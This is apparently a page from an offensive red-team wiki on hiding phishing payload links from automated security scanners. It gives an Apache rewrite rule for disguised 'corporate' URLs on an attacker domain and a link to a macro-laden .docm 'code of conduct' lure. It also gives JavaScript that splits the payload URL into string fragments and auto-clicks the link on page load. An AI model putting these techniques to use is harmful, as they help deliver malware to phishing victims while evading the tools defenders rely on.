Payload Hosting Obfuscation

Assume that an automated product will crawl the website.

To hide the link of a payload, simple use Apache mod_rewriterule to generate “corporate” URL with unique ID:

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} ! –f
RewriteCond %{REQUEST_FILENAME} ! –d
RewriteRule ^(.*)$ index.php [L,QSA]

https://bad.com/code/1241412......asd123r1/ will actually call https://bad.com/index.php

We can then use JavaScript to generate the finaly payload link. However, if the the HTML on the phishing website looks like this:

<a href="https://bad.com/payload.docm">download the code of conduct</a>

Automated security tools will easily process the HTML and pull the payload to perform further analysis, so, to obfuscate it:

<a id="download" href="#">
download the code of conduct</a>
<script>
document.getElementById("download").onclick = function() {
document.location= "https://phish" + "y.domain/pay" + "load";
}
document.getElementById("download").click();
</script>
PreviousEvilginxNextDiverting the Analysts

Last updated